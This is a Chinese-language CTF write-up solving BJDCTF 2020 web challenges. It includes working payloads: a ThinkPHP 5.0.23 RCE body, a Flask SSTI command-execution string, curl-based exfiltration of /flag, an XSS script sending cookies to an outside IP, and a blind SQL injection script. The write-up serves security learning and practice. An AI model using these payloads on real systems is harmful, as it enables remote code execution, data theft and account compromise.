2020 第二届BJDCTF wp

手速快拿了俩一血,后来一直在干asp反序列化那道题,可惜还是tcl不会啊啊啊啊啊

只记录了web的解题思路

文件探测

home.php存在文件包含,伪协议读文件:

home.php:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
<?php

setcookie("y1ng", sha1(md5('y1ng')), time() + 3600);
setcookie('your_ip_address', md5($_SERVER['REMOTE_ADDR']), time()+3600);

if(isset($_GET['file'])){
if (preg_match("/\^|\~|&|\|/", $_GET['file'])) {
die("forbidden");
}

if(preg_match("/.?f.?l.?a.?g.?/i", $_GET['file'])){
die("not now!");
}

if(preg_match("/.?a.?d.?m.?i.?n.?/i", $_GET['file'])){
die("You! are! not! my! admin!");
}

if(preg_match("/^home$/i", $_GET['file'])){
die("禁止套娃");
}

else{
if(preg_match("/home$/i", $_GET['file']) or preg_match("/system$/i", $_GET['file'])){
$file = $_GET['file'].".php";
}
else{
$file = $_GET['file'].".fxxkyou!";
}
echo "现在访问的是 ".$file . "<br>";
require $file;
}
} else {
echo "<script>location.href='./home.php?file=system'</script>";
}%

system.php:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
<?php

$filter1 = '/^http:\/\/127\.0\.0\.1\//i';
$filter2 = '/.?f.?l.?a.?g.?/i';


if (isset($_POST['q1']) && isset($_POST['q2']) && isset($_POST['q3']) ) {
$url = $_POST['q2'].".y1ng.txt";
$method = $_POST['q3'];

$str1 = "~$ python fuck.py -u \"".$url ."\" -M $method -U y1ng -P admin123123 --neglect-negative --debug --hint=xiangdemei<br>";

echo $str1;

if (!preg_match($filter1, $url) ){
die($str2);
}
if (preg_match($filter2, $url)) {
die($str3);
}
if (!preg_match('/^GET/i', $method) && !preg_match('/^POST/i', $method)) {
die($str4);
}
$detect = @file_get_contents($url, false);
print(sprintf("$url method&content_size:$method%d", $detect));
}

?>
Cookie:y1ng=8880cbd71721332a25aa6df7b12eb7ac53539100;your_ip_address=76d9f00467e5ee6abc3ca60892ef304e;

q1=&q2=http://127.0.0.1/admin.php?&q3=POST%s%

本来到这里就卡着了,后来看了一下过滤了admin,然后去访问admin.php,没想到还真有这个文件(我什么辣鸡字典),ssrf访问admin.php:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
error_reporting(0);
session_start();
$f1ag = 'f1ag{s1mpl3_SSRF_@nd_spr1ntf}'; //fake

function aesEn($data, $key)
{
$method = 'AES-128-CBC';
$iv = md5($_SERVER['REMOTE_ADDR'],true);
return base64_encode(openssl_encrypt($data, $method,$key, OPENSSL_RAW_DATA , $iv));
}

function Check()
{
if (isset($_COOKIE['your_ip_address']) && $_COOKIE['your_ip_address'] === md5($_SERVER['REMOTE_ADDR']) && $_COOKIE['y1ng'] === sha1(md5('y1ng')))
return true;
else
return false;
}

if ( $_SERVER['REMOTE_ADDR'] == "127.0.0.1" ) {
highlight_file(__FILE__);
} else {
echo "<head><title>403 Forbidden</title></head><body bgcolor=black><center><font size='10px' color=white><br>only 127.0.0.1 can access! You know what I mean right?<br>your ip address is " . $_SERVER['REMOTE_ADDR'];
}


$_SESSION['user'] = md5($_SERVER['REMOTE_ADDR']);

if (isset($_GET['decrypt'])) {
$decr = $_GET['decrypt'];
if (Check()){
$data = $_SESSION['secret'];
include 'flag_2sln2ndln2klnlksnf.php';
$cipher = aesEn($data, 'y1ng');
if ($decr === $cipher){
echo WHAT_YOU_WANT;
} else {
die('爬');
}
} else{
header("Refresh:0.1;url=index.php");
}
} else {
//I heard you can break PHP mt_rand seed
mt_srand(rand(0,9999999));
$length = mt_rand(40,80);
$_SESSION['secret'] = bin2hex(random_bytes($length));
}
?>

发现如果第一次访问带着参数decrypt,那么data就会为空,便可直接在本地得到加密后的值:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
<?php
# error_reporting(0);
session_start();
$f1ag = 'f1ag{s1mpl3_SSRF_@nd_spr1ntf}'; //fake
$_SERVER['REMOTE_ADDR'] = '174.0.222.75';

function aesEn($data, $key)
{
$method = 'AES-128-CBC';
$iv = md5($_SERVER['REMOTE_ADDR'],true);
return base64_encode(openssl_encrypt($data, $method,$key, OPENSSL_RAW_DATA , $iv));
}

$_SESSION['user'] = md5($_SERVER['REMOTE_ADDR']);

if (isset($_GET['decrypt'])) {
$decr = $_GET['decrypt'];

$data = $_SESSION['secret'];

$cipher = aesEn($data, 'y1ng');
echo $cipher;
if ($decr === $cipher){
echo 'WHAT_YOU_WANT';
} else {
die('爬');
}
} else {
//I heard you can break PHP mt_rand seed
mt_srand(rand(0,9999999));
$length = mt_rand(40,80);
$_SESSION['secret'] = bin2hex(random_bytes($length));
}

注意提交的时候要将+编码。。。。。。

old hack

tp5.0.23RCE,POST:

_method=__construct&filter=system&method=get&server[REQUEST_METHOD]=cat /flag

duang shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php
error_reporting(0);
echo "how can i give you source code? .swp?!"."<br>";
if (!isset($_POST['girl_friend'])) {
die("where is P3rh4ps's girl friend ???");
} else {
$girl = $_POST['girl_friend'];
if (preg_match('/\>|\\\/', $girl)) {
die('just girl');
} else if (preg_match('/ls|phpinfo|cat|\%|\^|\~|base64|xxd|echo|\$/i', $girl)) {
echo "<img src='img/p3_need_beautiful_gf.png'> <!-- He is p3 -->";
} else {
//duangShell~~~~
exec($girl);
}
}
curl xxx/`sort /flag|'base''64'`

fake google

flask ssti,

{{ config.__init__.__globals__['os'].popen('cat /flag').read() }}

Schrödinger

莫名奇妙的一道题,莫名其妙的做出来了:

B站找到这个av号,量力自学,很强,找到最后一个视频倒序查看评论,找到flag

简单注入

扫描发现robots.txt指明了一个hint.txt

Only u input the correct password then u can get the flag
and p3rh4ps wants a girl friend.

select * from users where username='$_POST["username"]' and password='$_POST["password"]';

过滤:

union and & && select ' " - = like mid

username用反斜线转义后面的单引号,password处的参数即可逃逸出来:

select * from users where username='\' and password=' || sleep(3)#';
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
import requests
import time

url = 'http://2d9c51e1-d6b9-466a-9232-cadb6c2ffeaf.node3.buuoj.cn'

flag = ''

for i in range(1, 100):
print(i)
for j in range(33, 128):
data = {"username":"\\", "password": "|| if(ascii(substr(password,{},1))<>{},0,sleep(3))#".format(i, j)}
print(data)
#time.sleep(1)
try:
req = requests.post(url, data=data, timeout=2)
except:
flag += chr(j)
print(flag)
break

得到密码:

OhyOuFOuNdit

登录即可得到flag

XSS之光

DS_Store泄露:

1
2
3
<?php
$a = $_GET['yds_is_so_beautiful'];
$b = unserialize($a);

开始以为要用到内置类,不过没什么可利用的,后来出题人提醒打到Cookie就行,然后构造了个打cookie的payload:

1
2
3
4
<?php

$a = "<script src='http://174.1.70.235:666/'+btoa(document.cookie)></script>";
echo urlencode(serialize($a));

监听的地方没收到,不过返回头中得到了Cookie,值就是flag…………..

elementmaster

最后一小时看到提示才做出来。。。观察的不够仔细,tcl

主页主要代码:

<img src="mendeleev.jpg"></body>
<p hidden id="506F2E">I am the real Element Masterrr!!!!!!</p>
<p hidden id="706870">@颖奇L'Amore</p>

id 16进制转字符,得到Po.php访问得到.,用提示的化学元素字典跑就完了:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
s = 'H, He, Li, Be, B, C, N, O, F, Ne, Na, Mg, Al, Si, P, S, Cl, Ar,K, Ca, Sc, Ti, V, Cr, Mn, Fe, Co, Ni, Cu, Zn, Ga, Ge, As, Se, Br, Kr, Rb, Sr, Y, Zr, Nb, Mo, Te, Ru, Rh, Pd, Ag, Cd, In, Sn, Sb, Te, I, Xe, Cs, Ba, La, Ce, Pr, Nd, Pm, Sm, Eu, Gd, Tb, Dy, Ho, Er, Tm, Yb, Lu, Hf, Ta, W, Re, Os, Ir, Pt, Au, Hg, Tl, Pb, Bi, Po, At, Rn, Fr, Ra, Ac, Th, Pa, U, Np, Pu, Am, Cm, Bk, Cf, Es, Fm,Md, No, Lr,Rf, Db, Sg, Bh, Hs, Mt, Ds, Rg, Cn, Nh, Fl, Mc, Lv, Ts, Og, Uue'
import requests
import time

dic = s.split(',')

flag = ''

for i in dic:
i = i.replace(' ','')
url = 'http://7d4f0e93-48b2-46a3-8c2d-34428a31db6f.node3.buuoj.cn/{}.php'.format(i)
print(url)
res = requests.get(url).text
#time.sleep(1)
if '404 Not Found' not in res:
flag += res
print(flag)

得到文件名,访问得到flag:

And_th3_3LemEnt5_w1LL_De5tR0y_y0u.php

假猪套天下第一

最后一分钟做出来的,手抖死了。。。。需要改的地方都在下面用#注释出来了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
GET /L0g1n.php HTTP/1.1
Host: node3.buuoj.cn:25575
Via: y1ng.vip # proxy头
Cache-Control: max-age=0
Origin: http://127.0.0.1
Upgrade-Insecure-Requests: 1
Client-ip: 127.0.0.1 # 本地访问
User-Agent: The Commodore 64, also known as the C64 or the CBM 64, is an 8-bit home computer introduced in January 1982 by Commodore International (first shown at the Consumer Electronics Show, in Las Vegas, January 710, 1982).[4] It has been listed in the Guinness World Records as the highest-selling single computer model of all time,[5] with independent estimates placing the number sold between 10 and 17 million units.[2] Volume production started in early 1982, marketing in August for US$595 (equivalent to $1,576 in 2019).[6][7] Preceded by the Commodore VIC-20 and Commodore PET, the C64 took its name from its 64 kilobytes (65,536 bytes) of RAM. With support for multicolor sprites and a custom chip for waveform generation, the C64 could create superior visuals and audio compared to systems without such custom hardware. # 不知道那个才是浏览器标示,直接全复制上来了
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: gem-love.com # 从这个地方来
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
From: root@gem-love.com # 邮箱
Cookie: PHPSESSID=3euk24qd394bk6rrv9lffgt6g7; time=4714846591 # 99年之后

参考http参数大全:

https://www.cnblogs.com/zhouguowei/p/5320438.html